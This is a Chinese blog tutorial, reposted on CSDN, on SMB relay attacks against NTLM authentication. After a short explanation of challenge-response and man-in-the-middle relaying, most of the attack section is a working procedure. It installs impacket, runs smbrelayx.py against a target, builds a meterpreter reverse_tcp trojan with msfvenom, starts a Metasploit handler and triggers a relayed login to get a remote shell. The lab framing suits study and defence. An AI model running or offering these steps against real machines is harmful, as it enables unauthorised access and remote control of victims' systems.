SMB重放攻击

最新推荐文章于 2023-06-09 20:01:15 发布
最新推荐文章于 2023-06-09 20:01:15 发布
阅读量617 收藏 1
点赞数
文章标签: git python 数据库
原文链接:http://www.cnblogs.com/ldhbetter/p/10216811.html
版权

0x01 原理

正常情况下:client端 --------- server端

1、正常情况,当client端登陆时需要先输入username,password和domain[默认是.,表示本地],之后client端会自己计算出password用DES加密后的hash,并将此hash暂时保存在本地

2、接着,client端会将自己的username明文发送给DC[server]

3、此时,DC会生成一组8字节的随机数,也叫challenge[挑战码],返回给client端

4、当client端在收到这个挑战码以后,会把先把它拷贝一份出来,然后再拿着这个挑战码和之前已经加密的密码hash再进行一次加密,加密后的东西叫response[响应],最后再将challenge,response和username一并发送给server端

5、server端在接收到client端传过来的这个三个值以后会将它们分别都转发给DC

6、DC在接收到username,response,challenge以后,会根据传过来的username,到自己的账号数据库中去查出来这个username所对应的hash,然后,再拿着这个hash和刚刚传过来的challenge再进行一次加密

7、最后,就剩比对了,把客户端传过来的response和在[6]中最后加密的hash值进行对比,如果一致,ok,认证通过,登录成功,反之,则登录失败

 

中间人攻击:client端 ----- 攻击者 ----- server端

1、client端还是正常向服务端发送登录请求,由于client端此时并不知道攻击者的存在,它以为请求是发送给了server端,但实际上它是先发给了攻击者

2、然后攻击者再拿着这个username假装成client端发送给server端,此时server端正常返回一个challenge

3、攻击者拿到这个challenge以后再把它返回给client端

4、而client端拿到challenge在本地和自己的password DES加密以后,会把这个response再次发送给攻击者,此时client依然还以为攻击者就是server端

5、最后,攻击者会拿着client端发过来的这个response再把它交给server端去验证

7、server端此时到自己的数据库中一对比,发现hash一致,认证通过,登录成功,可见,一次简易的smb中间人攻击就这样被完成了

 

0x02 目的

通过smb重放攻击获取目标机器的meterpreter

 

0x03 环境准备

1、目标机器:win2003

2、第三方机器:win2003

3、攻击机器:kali

 

0x04 攻击操作

1、下载安装impacket

安装impacket所依赖的加密库以及下载impacket到本地

pip install pycrypto

apt-get --reinstall install python-pyasn1 python-pyasn1-modules  (这一步操作可能会报一些错误,可自行百度解决)

git clone https://github.com/CoreSecurity/impacket.git

 

进入impacket目录,执行以下命令:

python setup.py install

 

进入example目录,执行以下命令

python smbrelayx.py -h 目标机器ip -e 本地生成的木马位置(由第2步生成)

1546508618936

 

会等待接受第三方机器传递过来的smb流量

 

2、利用msfvenom生成一个木马,用来反弹我们的meterpreter
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.74.136 LPORT=1234 -f exe -o /root/shell.exe

1546508843060

 

3、进入metasploit控制台,开始监听端口,等待反弹
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lport 1234
lport => 1234
msf exploit(multi/handler) > set lhost 192.168.74.136
lhost => 192.168.74.136
msf exploit(multi/handler) > exploit

1546509098420

 

4、在第三方机器上执行如下命令,向攻击机器传送smb流量
net use \\192.168.74.136\c$ "123456" /user:"administrator"

备注:192.168.74.136是攻击机器的ip

1546509485027

 

5、攻击机器捕捉到了smb 的登录凭证hash,然后,它又接着拿着这个hash到192.168.74.142[也就是我们的目标机器]去尝试登录,其实这就是所谓的重放,一旦登录成功,就会自动执行我们的马[类似我们用wmic远程执行代码]

1546509450487

 

6、成功获取目标机器返回的meterpreter

1546509413407

 

来源

https://klionsec.github.io/2016/07/20/smb-replay-attack/

 

转载于:https://www.cnblogs.com/ldhbetter/p/10216811.html

dda6607
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SMB攻击利用工具-----acccheck(原理)
SCR_123的博客
08-15 1071
SMB攻击利用工具-----acccheck(原理) 本工具是针对SMB协议的探测工具,但并不具备漏洞利用功能。探测SMB相应的端口和协议分析进行密码破解的,本质功能是密码破解 原理 445开放出来的默认共享:IPC$、ADMIN$,默认情况下只有管理员可以访问共享,acccheck工具尝试连接目标默认共享 net share 查看目标开放的共享 命令参数: -t 一个目标地址 -T 目标地址列表 -u 一个用户名 -U 用户账号列表 -p 一个密码 -P 密码列表 -v 详细列出 演示: 通过开放的默
smb中继攻击
cxk
06-13 1099
简单来说就是中间人攻击,窃取凭证 这里简单示范 攻击机 kali 192.168.5.102 靶机 win7 192.168.5.155 kali配置如下 靶机执行 dir \\192.168.5.102\c$ 无法弹回shell,不知道为什么,但已能获取到hash。即可pth 利用较简单,重点是如何进行欺骗。 ...
SmbRelay3 – SMB/HTTP to SMB replay attacks
cnbird's blog
10-09 1227
 Server Message Block normally provides shared access to files, printers, serial ports, and miscellaneous communications between nodes on a Windows network. So, you know how important it is! At the
NTLM/smb 中继攻击
灰太的表格的博客
10-19 1226
NTLM/smb 中继攻击
smb协议Android jar包
01-10
SMB(Server Message Block)协议是一种网络文件共享协议,最初由IBM开发,现在广泛应用于Windows操作系统中,用于在局域网内实现文件和打印机的共享。Android设备虽然主要使用的是Linux内核,但通过特定的库和API,...
smb.rar_SMB
09-23
【标题】"smb.rar_SMB" 指的是一个关于“超级玛丽”游戏源代码的压缩包。SMB是“Super Mario Bros”的缩写,是任天堂公司经典的平台动作游戏,深受玩家喜爱。这个RAR文件很可能是包含了这个游戏的源代码,供开发者...
smb21330.zip
03-30
标题 "smb21330.zip" 暗示这是一个与SMB(Server Message Block)协议相关的解决方案,特别是针对Windows 10操作系统中的问题。SMB是Microsoft开发的一种网络文件共享协议,允许用户在局域网内共享文件、打印机等...
Windows SMB高危漏洞
01-03
针对CVE-2017-11780的Windows SMB(SMBv1)远程代码执行漏洞,CVE-2017-11771的Windows Search远程代码执行漏洞 。
JAVA SMB共享文件夹操作文件jar支持smb2、smb3.rar
11-19
Java SMB(Server Message Block)库是用于在Java应用程序中访问和操作网络共享文件系统的工具,主要应用于Windows环境,但也可支持其他支持SMB协议的系统。SMB是一种网络通信协议,允许网络上的计算机共享文件、...
解读“重定向SMB”攻击
weixin_33736832的博客
03-08 680
腾讯电脑管家 · 2015/04/17 17:06前几天Cylance发布了一个影响Windows系统的漏洞,攻击者可以通过重定向到SMB协议的方式,利用“中间人攻击”来盗取用户认证信息。这个攻击究竟是怎么回事?“重定向SMB”又是什么呢?电脑管家漏洞防御团队对这些问题做了详细的技术分析,现将分析结果分享给大家。0x01 SMB/SMB2(Server Message Block)先简单介绍一下这...
内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)
最新发布
网络安全领域___专研者.
06-09 2678
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
SMB中继——内网渗透
include_voidmain的博客
04-26 3306
0x01 SMB协议 SMB概述: SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。 SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。 SMB使用了NetBIOS的应用程序接口 (ApplicationProgram Interface,简称API),一般端口使用为139,4
“Redirect to SMB”漏洞影响所有版本的Windows
weixin_34117211的博客
09-01 164
新的“Redirect to SMB(重定向到SMB协议)”漏洞是18年前发现的一个漏洞的变种,可导致所有版本的Windows遭受中间人攻击。 最新发现,一个旧漏洞的新变种影响着所有版本的Windows,并可能导致中间人攻击。 Cylance 安全公司SPEAR团队的高级研究人员Brian Wallace在博客文章中介绍了被称为“Redirect to...
重放攻击
Hugh677的博客
11-06 407
重放攻击(Replay attack,或称作重送攻击)是一种网络攻击,通过恶意的欺诈性地重复或拖延正常的数据传输而实施。因工作原理如同重放歌曲一样而得名。 假设绿帽向蓝帽要求认证自己的身份。蓝帽要求绿帽提供密码作为身份的验证。此时,红帽窃听通讯,并记录下绿帽的密码。在通讯完成后,红帽联系蓝帽,并要求认证自己为绿帽的身份,在提供了正确的绿帽密码后,蓝帽接受红帽的验证,并认可其绿帽身份。 ...
SMB暴力破解攻击,什么鬼?
热门推荐
三分恶的博客
03-31 1万+
最近在做的项目线上环境是Windows Server,有一天,安全检查的时候发现产环境服务器高危——服务器遭受了SMB暴力破解攻击! 遇到事情不要慌,先发……百度一下。 暴力破解攻击:暴力破解攻击是指攻击者通过系统的组合所有可能性(例如登录时用的账户名.密码),尝试所有的可能性破解用户的账户名.密码等敏感信息,攻击者会经常使用自动化脚本组合出正确的用户名和密码。  暴力破解攻击是一种穷...
网站安全之——重放攻击
iteye_5347的博客
08-24 2254
转自:http://baike.baidu.com/view/1569933.htm 重放攻击(Replay Attacks)又称重播攻击、回放攻击或新鲜性攻击(Freshness Attacks),是指攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程,破坏认证的正确性。 它是一种攻击类型,这种攻击会不断恶意或欺诈性地重复一个有效的数据传输,重放攻...
tcp pcap重放
andy_csdn_2015的博客
09-25 2027
.e.g tcpprep -c 192.168.2.47 -i dns.pcap -o dns.cach tcprewrite --endpoints=192.168.2.48:192.168.2.46 -i dns.pcap -o out.pcap -c dns.cach tcpreplay -c dns.cach -i eth0 -M 8 -l 1000 out.pcap
Web安全实践(14)嗅探,arp欺骗,会话劫持与重放攻击(下)
weixin_34032621的博客
04-22 222
                                                                                                作者:玄魂 本系列导航http://www.cnblogs.com/xuanhun/archive/2008/10/25/1319523.html 安全技术区http://space.cnb...
SMB致命攻击:网络入侵与安全风险解析
其中,SMB会话包的捕获和重放是常见的攻击手段之一。攻击者可以监听网络流量,获取其他用户访问共享资源时的SMB会话包,然后利用这些包尝试登录受害者的计算机,可能导致系统重启或出现蓝屏等问题。这体现了SMB协议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值